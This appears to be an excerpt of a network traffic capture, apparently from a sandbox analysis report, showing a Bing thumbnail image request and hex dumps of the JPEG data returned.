2024-12-08 12:31:19 UTC	16384	IN	Data Raw: bc 8a bb 76 fa 52 78 ef 6b ef 3b 5e c7 74 30 d0 a6 fd dd df 99 cf 78 9b c3 d6 7a dc 68 da 87 97 67 79 6e 8b 2a 5c 43 f3 6f fc 0b 7c df 4e 2b 8c bc be 9f 4b d6 16 c7 50 b4 92 58 f7 ff 00 a3 dc 43 bb 6c ca 3a 1f f6 6b d0 bc 45 68 be 5e d6 9e 0b 7b a5 ff 00 5c e9 f3 79 cb 5c 27 8b 2f e7 d2 35 28 6d ef 2d 27 f2 e5 db ff 00 5c b6 d7 a5 87 fd f4 3d 9b 5c d6 5a 2b d9 fc 99 e7 66 34 61 07 ce 97 2b d3 55 d7 d7 fc cb 91 bd a4 b2 24 d7 10 6d db bb 63 a7 cb f3 74 e4 7f 7a 92 c6 26 82 ea ee f3 fb 4a 46 b5 8a 1d de 4f 96 ca c9 df 35 52 de f2 3d 5a 0d ab e4 5c 2e ff 00 be ef e9 ef 4f 87 51 fb 64 ff 00 67 93 cb f3 2d e5 68 bf bb be b8 5c 6a a5 28 da dd d7 65 f3 39 1f 2b 6a ff 00 22 e5 c4 12 dc 68 68 b0 f9 6b 37 fa d8 5d 3f bd f7 b8 e6 b0 f4 9b c9 ef 6e b6 fd 82 08 99 b7 Data Ascii: vRxk;^t0xzhgyn*\Co\|N+KPXCl:kEh^{\y\'/5(m-'\=\Z+f4a+U$mctz&JFO5R=Z\.OQdg-h\j(e9+j"hhk7]?n
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 3e fd af 25 6f 53 56 6b cb 69 a0 fb 0e a5 fe b3 7a ff 00 ae 76 6f 9b 6e 7e f7 a7 a5 66 ea d6 92 e9 da 6c d3 5a f9 fe 5c ff 00 eb b7 cf f2 ed 3e ff 00 ec f6 a9 ee 35 1f 3f 46 49 ae 2d 3e 6d 8b f3 a2 7f ec a6 a9 78 a1 ef 1e d6 e2 6d 37 f7 b2 5d 43 b5 d3 ef 2b b0 c7 af f1 57 46 12 35 23 52 30 7a 45 bd 53 7a 5e e4 4a 16 bb b6 b6 f9 8b 70 22 7b 1f b7 6a 1f 35 bd ac df 3e cd d1 32 30 fb 8c 54 e6 aa e9 7e 29 8a 5b af 2e ea 4f dc ef 68 a1 99 11 57 e5 1f fb 37 b5 65 f8 4e e3 51 b3 ba 89 af a4 91 a4 bc f3 17 63 a3 2f 46 f7 e1 b3 5b de 26 b3 6b ad 29 ed e6 f3 16 4b 57 dd 6f 32 7c dd 7f f4 35 c5 7a 55 a9 d1 a7 5b d8 d6 f7 93 d9 a7 b2 eb 65 eb bf 73 28 ca 53 8b 9c 55 99 34 77 f6 6f a6 db b2 cf 1d c2 ae e5 9b 66 df 91 8f af f7 6a 39 0b 4b 3e e8 7c fb 85 b7 89 97 63 ff Data Ascii: >%oSVkizvon~flZ\>5?FI->mxm7]C+WF5#R0zESz^Jp"{j5>20T~)[.OhW7eNQc/F[&k)KWo2\|5zU[es(SU4wofj9K>\|c
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 1e ba de b3 49 f6 06 89 d9 5f ed 68 db 7f ef b4 dc 2a a3 88 a7 27 65 25 72 65 46 a2 57 71 76 f4 3a f6 0c b4 df 9b cc db 55 74 fd 4e 2b fb 5f b4 59 cf 6b 71 0b 7f cb 68 9f 72 fe 95 2b 5c ca bf dc ad 35 25 58 99 bf bd 4d f9 bf 8a a3 f3 e4 fb bf bb a1 6e 25 6f bd e5 d0 17 44 8a 7f 79 44 9b a9 be 7f f1 79 7b aa 36 9f fe 99 d1 7b 8f 71 f8 dd 26 ea 5f bd f7 a3 db fe e5 46 d3 ed f9 bc ba 74 72 7f d3 4a a6 1a 77 17 fe d9 ee a1 bf bb 43 14 5f f7 a9 19 e3 59 36 f9 9f 35 48 c2 42 be 5f cb 4e f9 4f de 92 88 f6 ff 00 cf 4a 74 91 ee 8f e5 a9 e6 d0 7c a3 7e f4 7b a9 18 ff 00 15 2a c1 fb ca 1a 2d df 33 51 74 c1 21 19 7f 79 ba 97 1f de a6 b2 7f df 34 bb 3f 85 7e f5 26 2b 30 90 7f 15 2f 4a 6f 97 fc 2d 42 ee f3 3f dd a6 16 63 9b fb b4 d6 1b b6 6d a3 0f ff 00 02 a5 54 66 a5 Data Ascii: I_h'e%reFWqv:UtN+_Ykqhr+\5%XMn%oDyDy{6{q&_FtrJwC_Y65HB_NOJt\|~{-3Qt!y4?~&+0/Jo-B?cmTf
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: d2 ba 3f ee a5 86 3e 1a 3f 2d db ef 71 fc 07 e5 cd 4d e2 ab 68 25 f8 79 a7 4d 75 69 f6 29 ad 5f 6d c2 26 df b5 3c 61 5d 15 9f fe 07 ee 71 59 e3 28 d0 c4 63 62 9d a2 f9 b9 5a 8a 57 d1 35 16 d5 93 69 db 4d 3f e0 dd 37 3f 66 e4 bb 7f c3 94 fc 3b 37 8b 34 7d 0e 69 23 fb 5b 5c 44 eb 12 7c 91 b2 cc bb 78 11 b2 1d df 28 fa ab 0a d4 f1 85 ed b2 f8 76 1f b1 db c1 67 aa 5f da 5b b4 cf 70 8c d2 cc a7 f8 53 d3 3d 4f e7 59 df 06 f5 0d 15 ee ed 16 fa 48 2d e6 b5 b7 65 49 bc b6 55 79 0b 7f 1e de 5f fd 9f 4a 67 8d 3c 23 79 7b e2 0d 3f cc d7 63 ba 6f 35 57 63 bf cb 32 ff 00 1b 7f b1 fe eb 75 f6 ae ba ce 82 cd 9d 3c 52 f6 6e 37 95 d2 6b 9b ad ac ae 9a d1 6e fa f6 1c 64 dd 1b c7 5b e8 74 1e 3a d2 59 a4 d2 f5 49 23 f3 5a df 4e db 0d da 3f 95 14 2c 8d b9 97 9f f7 f1 83 d7 a8 Data Ascii: ?>?-qMh%yMui)_m&<a]qY(cbZW5iM?7?f;74}i#[\D\|x(vg_[pS=OYH-eIUy_Jg<#y{?co5Wc2u<Rn7knd[t:YI#ZN?,
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: da f6 4b 7d 1e 69 23 6f e2 79 a1 9f c8 64 50 bc 75 fb df ee 9f c2 96 eb 47 f3 e4 69 23 92 49 5a 27 fd f4 3e 7a af 45 dc 4f f4 f9 be 95 e3 55 94 61 52 52 ae dc 25 2b eb 64 95 af a7 93 7e 6d 1d 6e 7e ea 51 2a 46 25 b5 be 79 2d e3 8f cc d9 f7 3c 85 6d 8a 7a b7 15 06 9e f0 36 95 6f 67 35 df fa 2c 1f 32 6f 76 f9 24 dd b7 fe 03 9c d5 9d 72 09 f4 b9 fc 9b 59 ee ad e1 df b5 d2 ef 6b 7c db be e7 e0 a6 a8 b5 f5 e5 bd dc cd 34 76 bb be 55 de 89 f2 ee fc 33 5d 94 e6 b1 14 d4 a8 f5 eb 7e df 2f 33 19 49 ad 3a 0d d7 af 2f b4 e8 d2 ea 38 e0 56 57 f9 1f fb f8 5d dc b6 7a d5 1d 3f 5d 9d b6 59 ad 85 ad d2 dc 26 d7 74 db f3 e5 b7 ed 7e fc 35 49 75 3d cc b6 af 24 36 9b 63 95 ff 00 7c fb f7 2b b7 b7 f7 7e f5 61 de 3c b6 ba 8c 32 2b c7 14 9f df 4f 99 5f b7 6a f4 70 d8 58 4e 9f Data Ascii: K}i#oydPuGi#IZ'>zEOUaRR%+d~mn~Q*F%y-<mz6og5,2ov$rYk\|4vU3]~/3I:/8VW]z?]Y&t~5Iu=$6c\|+~a<2+O_jpXN
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 2d 26 c7 fb 36 7b 55 6b bf b4 a2 4c 8c bf 31 fb cd b8 73 fc 5d 6b b6 f8 a7 a9 4f a5 68 f6 f6 2d 77 3f 97 15 de df 9d fc a9 ed 6e 42 f0 cb b0 7e f1 76 b5 4d 1e 8b 67 17 88 2c 66 d5 2e ee 95 a5 db 22 5e 7d aa 3f 9d 93 fe 59 f9 7f c0 a3 df f3 ae 6f e2 b6 b7 a8 58 5a ea 3a 3d f7 9f aa 5a b5 a7 9b 14 c9 03 32 d9 b0 fb ad dc a1 ec 4e 76 d7 9b 4e b4 33 8c c2 85 a2 bd d5 76 b6 bd dd b4 6e fb 5f 66 d3 e9 e4 74 d3 a7 c9 4e a7 33 fe af b1 d6 e8 fa f4 5a df 88 2e 34 18 e3 fb 55 8d aa 6e ff 00 8f ad cc ed fe cb 70 fc d4 5f 62 d0 d7 4a 7f 08 da db a2 c2 de 67 d9 9d 11 7c d8 5b ef 67 7f 5d df ef 7d 2b 82 f0 5c 3a 7e 8d a6 da 78 a1 b5 37 5b eb a8 7c ab bf 36 7f 97 e7 6c 89 17 23 3f 2a fe 0d d8 e6 ae 78 bd bf b3 3c 54 91 c3 71 74 d6 3a a5 8a ac db d3 6b 3b 37 39 55 f4 6e Data Ascii: -&6{UkL1s]kOh-w?nB~vMg,f."^}?YoXZ:=Z2NvN3vn_ftN3Z.4Unp_bJg\|[g]}+\:~x7[\|6l#?*x<Tqt:k;79Un
2024-12-08 12:31:20 UTC	16067	IN	Data Raw: b7 af db 91 13 76 c9 87 dd 1d f7 67 3d fe e9 ac 6d 5b c3 6d 71 e2 6d 7a d6 f9 2d 1b 52 bc bb 5f b3 dc 5c a7 fc b3 48 fe 42 a8 ad fc 4c aa 73 f9 83 5d ad d5 8d a5 df 88 26 58 ff 00 75 a8 35 a3 2c 2e 8e de 44 df 2f ee d8 ff 00 7c fd e5 cf fb 35 ca 6b d6 13 db 6b 93 6a 4d 77 25 c4 d6 b6 ec be 4c c8 bb be 4f ba 71 fd ec d7 46 5d 8a 9a 8a 85 3a 9c ad 47 48 db ab 7c ca cd 74 e9 ae 8d 25 73 6a 91 6e 3b 9a 53 58 40 96 b6 97 17 50 79 b7 56 b3 46 be 4b ce b1 6f 91 e3 77 65 54 6e 1b e6 da 7f dd ab 3e 24 ba 5d 47 c3 0f 0d d4 12 2c 29 ab c1 f6 1f 27 e5 d8 c1 4e ef 97 fb bf 4c 7a d7 9a 6b 92 cb 75 f0 e5 ed f4 bb b9 de de ce ee 4b 99 b7 a2 b6 fc af de 3f 4a d3 f8 6f a9 ea 1a 25 ac 2d a8 47 05 af db 1d 57 ca 87 ef 79 61 78 6d bf de e5 bb f4 ae e9 64 b5 63 49 57 e7 e6 9c Data Ascii: vg=m[mqmz-R_\HBLs]&Xu5,.D/\|5kkjMw%LOqF]:GH\|t%sjn;SX@PyVFKoweTn>$]G,)'NLzkuK?Jo%-GWyaxmdcIW
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 3c df 9f fd 6c d8 ff 00 74 7f 3a c3 b8 78 1a 48 6e 26 9f 76 e7 dc 89 0a 6d 5d a3 a7 6a 54 26 a7 07 0e 5f 7b bf 5f 40 92 f7 af 7d 09 3c 45 79 1d c7 ee ee 3e d5 14 db 3c dd f6 ff 00 37 b7 cf 57 bc 3b 72 b7 1a 6d f4 96 ff 00 bd 55 87 ca d9 b1 bf 7c df af 4a c5 92 f2 f3 cf 9a de 3f 33 c9 9e 6d b0 bb fd dd c7 e6 fb d5 7b 4f 78 34 48 12 66 fd ec 71 6e 57 d9 ef fa 7b d6 98 8a 29 61 95 28 ab cb a2 df b5 c5 17 79 df a1 d5 c3 a1 2b 78 7e e2 e1 b5 2f f4 89 51 65 48 5e 0d bf bc 4c 6e 55 eb fd e6 c7 f9 c4 1e 15 f1 3d 8e 97 1b df 34 ff 00 68 b8 58 76 a6 c4 f9 b7 6d 70 3a fe 55 4f 5c f1 0c bf f0 8a a5 c4 70 6a ab 33 4c ab 6f 71 b3 6a ba ed f9 b3 fd f6 c7 6f c7 ad 71 7a 6c ab 06 c9 17 cf f2 d7 ee 6f 4d ad f7 ab 83 03 92 d5 c7 61 ea fd 71 bb 37 a2 d3 a5 b4 ba 5b 6d e6 74 Data Ascii: <lt:xHn&vm]jT&_{_@}<Ey><7W;rmU\|J?3m{Ox4HfqnW{)a(y+x~/QeH^LnU=4hXvmp:UO\pj3LoqjoqzloMaq7[mt
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: ed 8e cd 16 d7 50 0e 03 71 d7 fd 95 fb d5 4f 54 d1 e5 d6 74 df 27 fe 5f ac ed fc bb 1d 8e cb e7 7c d9 c3 67 bf ff 00 58 55 cd 06 e2 29 64 86 ce de 78 da d5 bc b6 b8 7d f2 6e ff 00 69 77 e3 ee fd 45 6d d8 cf fd 9d ac b3 32 6e 5b 74 58 b6 7c cd ff 00 d9 32 86 e9 dc 76 35 f3 d5 31 32 c1 5b d8 c6 d3 8e b7 d6 ef 5e a9 fd cd 76 67 6d 0a 5c ea ed 1e 67 0e ae da 76 8f 71 63 0c 9f 67 b8 96 68 f7 fc ed e6 a3 0e 72 2b ab f0 6e b9 05 e5 8a 69 b2 4f 3c b3 2d a4 8a f3 6f 66 d9 bd bf 8f fb b8 db ef 5d a7 8d f4 3d 33 c5 d1 b6 d8 e0 fb 47 cb b2 e6 54 db 3f 2b d3 76 3e 6f f8 15 78 fd e6 9d ab f8 57 52 9a 16 8e 48 a6 fd e6 cb 8d 9b 5a 65 fe 47 e9 5e ce 13 19 80 cf f0 f2 a6 e3 ec eb df 9a cd f5 b5 ae 9d b5 5e 46 75 29 ce 9c 93 b5 e3 dc ed ee 2e ed 75 4b a4 be 9a 08 ef 6d ed Data Ascii: PqOTt'_\|gXU)dx}niwEm2n[tX\|2v512[^vgm\gvqcghr+niO<-of]=3GT?+v>oxWRHZeG^^Fu).uKm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49727	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:19 UTC	375	OUT	GET /th?id=OADD2.10239356819466_1PN1118HHI92HRAXE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-08 12:31:19 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 978255 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 79951D1F769C4665A5FEB320D214FE03 Ref B: EWR30EDGE0320 Ref C: 2024-12-08T12:31:19Z Date: Sun, 08 Dec 2024 12:31:18 GMT Connection: close
2024-12-08 12:31:19 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 15 e0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 31 38 3a 32 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:18:238
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 9d 08 c7 48 df 5f 40 dd 55 ae 35 db 6b 0f 10 7f 65 de 58 cd 2c 72 da fd a6 5b a8 a6 ff 00 57 fd c5 db 53 46 fb e1 f3 2b 9e f1 1c bb 3c 4d 75 67 fb 9b 59 25 f2 2c a2 d5 65 87 ce f2 d3 c9 8f 72 bc 3f ed 37 fc 0a a3 32 ad 2a 54 bd dd ce 9e 17 c0 d2 c5 63 27 0a b1 bc 52 3a 7b 8f dc cd e5 c9 59 be 20 ff 00 4c be d2 b4 7f f9 eb 2c f7 32 ff 00 1f c9 1a 79 4b ff 00 8f 3b d4 1a 7f 8a 25 d6 f5 4f 0a db d8 0f 2b 53 96 57 93 5f b0 96 1f 9e 3f 22 db ef 47 bb ef 2f 98 bf 2d 5a f0 5d d5 96 b1 e2 0b ab c8 ef be d5 26 97 14 9a 4f 9b e4 ec 9b fd 74 8c ff 00 27 f7 fe e2 b5 78 59 c6 6d 0f a9 4a 31 de c7 d5 e4 1c 33 3a 19 84 71 12 96 8a fa 1a 9e 11 b0 b2 b5 d4 bf b3 27 f3 a3 8e 2b 08 e2 96 2f f6 22 de e8 ff 00 f0 2f ee d7 37 71 75 aa 5b 5a 45 71 1c f7 97 49 7d 2b db 79 b6 9f Data Ascii: H_@U5keX,r[WSF+<MugY%,er?72*Tc'R:{Y L,2yK;%O+SW_?"G/-Z]&Ot'xYmJ13:q'+/"/7qu[ZEqI}+y
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: 85 a4 13 5a da 69 72 ea b1 45 14 50 3b f9 91 6a 10 fd aa 1f 2b fd cd f2 ff 00 bd 4f 2f 9f 38 4f dc 30 b4 bb ab 99 bc 09 fd b1 71 7d 65 f6 7f dc 6a de 54 b0 fe fb f7 73 46 ce b1 bf fb 48 ff 00 f7 d7 fb b5 e8 b6 f7 11 d8 68 b1 59 c9 e7 79 96 b1 49 1c bf c0 92 7f bb bb fe f9 af 34 7b 8d fa 9c da 7d 9e 87 65 f6 8d 67 c2 da 54 71 79 5b 1f ec fe 6c 29 ff 00 00 f9 64 8e 46 ae e7 5c b8 8e db 45 d5 64 b8 9f cd f2 a2 bb f3 6e bf e9 ab 7d a3 67 fe 81 5e fe 3e 10 8a 84 62 73 51 9f 31 d8 68 ed 13 ff 00 67 d8 5c 41 79 2d 9c ba a5 a5 b5 fc 51 4c 9b 3c a9 e1 dd 6f 27 f7 95 b7 cf e5 b5 6f 69 f6 77 0f e1 fb 4b c9 26 9a 58 e4 bf 82 4b af 37 e4 b9 fb 52 bb 43 23 49 ff 00 c5 57 3d e0 c7 b9 b6 9b c3 f2 5e 79 11 47 16 95 69 f6 a9 7c 9f df 79 4c 90 46 ff 00 7f f7 6f f3 79 7b f7 Data Ascii: ZirEP;j+O/8O0q}ejTsFHhYyI4{}egTqy[l)dF\Edn}g^>bsQ1hg\Ay-QL<o'oiwK&XK7RC#IW=^yGi\|yLFoy{
2024-12-08 12:31:19 UTC	16384	IN	Data Raw: ef be 4f 97 ef 27 fc 0a b9 8f 14 6b b6 4f 34 5a 84 70 79 56 7f bb b6 8b ef ff 00 a2 4b bf f8 7f b9 bf be ff 00 92 bb 67 4e 75 7e 13 08 7f 78 b9 6f a6 6a 3a c4 da 84 9a a5 f4 d1 47 75 75 25 cd d4 bf c7 71 f7 db cb 8f 77 fc b2 dd d1 1f f8 78 ab ff 00 e9 3a 96 8b 6b 79 6f 3c 3e 5c bf f1 eb e5 7f c7 b5 c2 49 fd df 33 f4 fe 3a 87 7c 69 a2 fe ee c6 68 ae 2d 62 fd d7 9b 37 c9 71 b9 f7 f9 9f ed ed d9 5c de 87 aa c9 67 a5 da c9 6f fb d8 ec 2e e4 8e 2f 36 14 9b ec ff 00 3e e7 ff 00 80 6e 7f ba df 3e da bf aa f2 fb a3 f6 dc de f1 66 dd 24 87 5a b5 f3 20 f2 a4 97 55 b4 b6 96 59 7e 78 63 89 bc c5 97 7f fb 26 bb cf 07 e8 f6 d0 ea 92 db db df 79 b7 16 b7 57 77 36 b1 7d c8 64 b5 5d 9b d1 f7 b6 e8 f6 37 fb 35 ca e9 76 31 cd a6 5a dc 49 aa cd 2d bf fc b2 b4 f3 9e 1f dd 48 Data Ascii: O'kO4ZpyVKgNu~xoj:Guu%qwx:kyo<>\I3:\|ih-b7q\go./6>n>f$Z UY~xc&yWw6}d]75v1ZI-H
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 45 6f fd 81 1c 7a 7f 9b fb 9b 68 fe 4f dc 7c df ed 37 c8 7c cf f7 4d 76 7e 55 cd 9f 95 26 87 7d e5 47 2c 5e 64 b1 45 0a 79 3f 6a 57 fd e7 94 df ec ad 73 da 5e 99 f6 6f 17 45 79 27 93 75 6f 7f e6 49 fe bb f7 d1 a3 26 d7 7f 2d bf ef bf f6 9b 7d 43 e2 4d 57 66 99 75 a1 e8 ff 00 eb 22 96 3f f5 5f 26 91 e6 ff 00 ab 69 7c ad df be b8 ff 00 6f 76 cf 6a fa 09 54 85 5f 7e 27 99 c9 c9 ee 98 ff 00 10 2e e4 bf d5 2e b4 b9 27 b2 8a f2 5b 59 24 96 59 6c b6 5c df f9 4f e7 a7 fa 4f fb 6d d3 7f cd 5c df c3 bd 56 e7 fe 12 eb ab 88 e0 9a ea 3b ab af 2e 5f f7 23 b6 79 37 7f df 55 7e 4b 28 ee 6f 62 8e 3f 26 ea 4b 5b a8 e4 f2 a5 9b ce 49 22 df fb c8 db fd 96 5a 87 45 d3 ec f4 df 88 de 2f f0 79 9f fe 25 96 b7 57 da 6c 52 dd cf e4 cd 3c 1b e0 92 0d af ff 00 3d 76 fc 9b bf 8a bd Data Ascii: EozhO\|7\|Mv~U&}G,^dEy?jWs^oEy'uoI&-}CMWfu"?_&i\|ovjT_~'..'[Y$Yl\OOm\V;._#y7U~K(ob?&K[I"ZE/y%WlR<=v
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: cf ff 00 63 5b 1b 2e 5f 54 b5 b8 f3 fc db cb ff 00 f9 88 5d de ef fe 0f f5 af 1a 7f 96 ab 87 3f 27 bd d4 0b ff 00 0e ed ff 00 73 14 97 90 7d 96 de 5d 57 cb 97 f7 29 fb bb 79 fe 4b 8d cd fe da d7 0d e0 fd 4f ec 7f 0f b4 5b 3b 8f f5 7a 36 9f f6 2b a9 65 99 21 f2 e2 b6 79 22 5d ff 00 de f9 7f f4 3a ec 2f 35 58 de 6b 5d 3e f3 4a d5 22 f3 62 fd d7 95 7a ef e6 7c 9f be 78 23 7f e2 d8 8e ff 00 c7 5e 6f f1 01 e3 4f 1d 78 aa de 4f f8 f8 ba bb 9e 48 a5 97 fe 9e ed a3 dd ff 00 03 fd e5 18 5a 3c f5 b9 42 73 f7 0f 42 f0 fe b1 e7 78 83 4f bc 8e 0f f4 8b 5f 22 38 bf 73 bf fe 9a fc e9 f7 b9 49 23 f9 2a fc 9a 7d cd b6 8b 6b 1f 91 e5 47 f6 5f b3 7f c0 e3 7d ea ff 00 f0 3d f5 c7 f8 3e ee 34 f1 06 95 6f f6 eb df b3 f9 52 5b 4b 75 69 0f 9d e5 a3 43 e5 f9 bf f5 d6 06 f9 b7 7f Data Ascii: c[._T]?'s}]W)yKO[;z6+e!y"]:/5Xk]>J"bz\|x#^oOxOHZ<BsBxO_"8sI#*}kG_}=>4oR[KuiC
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 27 fa 37 f0 ff 00 b7 5a ba 7e 95 a7 43 36 8b a3 e9 f0 79 5a 7c ba fc 7e 6c 5f 3e f9 22 d9 27 fc 0a a6 f1 03 c8 9f 16 e5 f1 07 ee 7f 7b a7 e9 b2 5d 4b ff 00 4f 13 fe e5 3f f4 0e 6b e9 30 b5 b4 97 99 c5 38 17 34 3d 57 66 a9 6b ae 47 fe ae c3 ff 00 26 11 53 ee ff 00 e4 4d 95 ec 7e 17 b7 fb 67 86 2d 63 d5 34 af b7 e9 77 5a 7c 12 4b 6b fc 76 ee ae 8f f2 37 f7 a3 7f de a3 ad 78 25 bd bc 9f f0 8f ea 1a 7c 9e 74 b7 11 5a dd c9 2c 52 fe e5 f7 fd a7 6d 7b 07 81 ef 74 ed 63 4b fb 65 9c f3 5d 49 fd 9f fb df 2b 67 ee f6 cd f2 4b e5 a7 ef 21 64 6f 93 ff 00 66 af 33 15 0f 70 d9 1c 97 8e 2d 24 b6 f1 46 95 a8 6a 1e 77 97 ff 00 13 2d 26 eb fe 9f 3e d2 fe 7c 77 1f 2f f7 9e 19 7f e0 74 69 76 9f 63 bd 96 f3 ed d3 45 1c 51 47 6d e6 ff 00 cb 18 d9 be 64 fd d7 f1 7e f6 3e 5e a6 Data Ascii: '7Z~C6yZ\|~l_>"'{]KO?k084=WfkG&SM~g-c4wZ\|Kkv7x%\|tZ,Rm{tcKe]I+gK!dof3p-$Fjw-&>\|w/tivcEQGmd~>^
2024-12-08 12:31:20 UTC	16067	IN	Data Raw: fd f4 72 47 f7 5b 72 49 07 97 b7 fe 59 ef 7a e5 7c 39 7f 71 e1 fd 4b 4f bb 4b d9 b4 c9 2d 66 9f ec b7 fe 73 ff 00 aa 96 17 8f fe 03 f2 cd bb fd f8 d2 ba af 87 76 ff 00 ea af 24 b1 d6 ae ae 2c 22 4b 68 be d7 f7 e4 4f 93 7e fd ff 00 7f cc 5f 91 b7 ff 00 c0 1b 75 70 de 30 d3 23 d2 a1 ff 00 84 7e df c9 8a 4f 36 4f b2 5d 79 df b9 fb 3f fc b0 ff 00 c7 3c ad d4 e8 43 f7 fc bd cd 39 fd c3 1f e1 5d bc 76 1a 5c ba e7 db a6 96 4d 2f 4f 82 da 2b ab 49 b7 bd c7 9b bd 21 64 df ff 00 4d 25 f9 97 f8 7c f7 ae a6 d7 46 d2 88 b4 fb 7b 4e 3e c1 34 f6 5a fd ad 9e fd f7 1a 6d e7 fa 2c b7 5b ff 00 e5 af d9 a6 96 de 7f 97 fd 56 ca e7 34 fd 3e ca c3 4b d2 b4 bf 23 ed 56 fe 6c 97 b7 52 da 7f ae fb 3d b7 97 2a ba ff 00 73 7c ae 9b 7f ef 9a d8 f1 44 51 c3 65 a5 7f c4 d6 6f b6 69 7a Data Ascii: rG[rIYz\|9qKOK-fsv$,"KhO~_up0#~O6O]y?<C9]v\M/O+I!dM%\|F{N>4Zm,[V4>K#VlR=*s\|DQeoiz
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: f7 88 9f ed f1 5a b7 91 7f 63 e9 71 69 7a 85 f7 da af 25 d4 24 92 5f 3a 1f f8 f8 dd 36 cd df f7 cf dd ff 00 a6 9d 2a fe a9 e6 7f 62 c5 27 9f 7b 7f f6 0f de 7e f7 7c d3 47 71 6d 79 6f 73 e5 fe f1 bf 85 a3 99 3f bb 5d f4 67 ec a1 cb 1d 51 cd 28 73 9b d6 77 b2 5c ea 7e 1f d4 23 fd d4 91 4b 77 25 ac 52 cd fe ae 5f 91 22 fb df c2 ab 0d 1a c6 9f 2f 8b 7e 12 6b 5f d9 73 c1 fe b6 0b 9d 03 ca d9 e4 fd a2 09 ae 3e 5d df ed f9 72 46 89 fc 0e f5 9b e3 0b 79 3c 9d 3f 4f bc ff 00 40 92 eb 50 92 3f 37 50 9b ec cf b2 e7 cd 69 ae 52 1f bf b1 56 3f bf f7 77 d6 c6 a8 f6 56 7e 18 d4 34 3b 78 2f 7e cf 6b 17 99 e6 c5 34 36 d3 5b da db 5e 45 2c bf 23 fe ef cc da fe 6f 9b 5c 15 3e cc e3 b9 d4 60 e8 fa 85 b5 fe 97 a7 fd a2 09 ae af 2f f4 a8 e4 b5 96 5b 2d fa a7 da 24 df e4 db 4f Data Ascii: Zcqiz%$_:6*b'{~\|Gqmyos?]gQ(sw\~#Kw%R_"/~k_s>]rFy<?O@P?7PiRV?wV~4;x/~k46[^E,#o\>`/[-$O
2024-12-08 12:31:20 UTC	16384	IN	Data Raw: 08 3e c7 2e ab a9 49 a8 5f cd 0f ef a4 f2 2e 7c c4 b6 f3 7f 81 5f fd 7e df e2 f2 52 b9 8d 42 2f b7 c3 aa c7 a8 41 37 fa 7e 9f 7d 17 fb 72 7f a3 79 3f f7 cf f1 d3 3c 69 ad 0d 62 fb c3 76 92 08 25 96 3b ab ef 2a 2f 9f c9 d9 e4 c5 bd 3f db 92 79 1f cf 6f fa 67 f2 d1 1b db 79 d2 c9 e7 f9 b1 cb 6b 25 cf ee bf e7 de 57 48 ff 00 fb 11 5a 60 e1 fb 91 56 f8 c7 d9 dc 46 9f 0a f4 5b 7d 42 78 7c cf 2a 0b 68 a2 96 1d 93 7e fe 6f ba 9f f7 c4 ad b3 f8 57 a5 6f 68 f7 71 fd b7 4a bc d5 3c 9f b1 ea 9e 2a 8e 4b a9 65 9b c9 ff 00 48 5f 2f ca 97 7a 7f 17 ee bf d6 3f fb bf ed 56 6d 9e 83 fd bd f0 de d7 43 d4 27 86 5b 8b a8 bc cb 5f 37 fe 5d 2f 6d 9e 56 b7 d9 fe d7 f0 7f b4 be 65 50 b7 d4 f6 68 be 1f 92 f2 0f f4 7f ed 09 2f 75 0b 59 7e fc 6b ff 00 1e 9f 67 6f ee 32 cd 77 b7 67 Data Ascii: 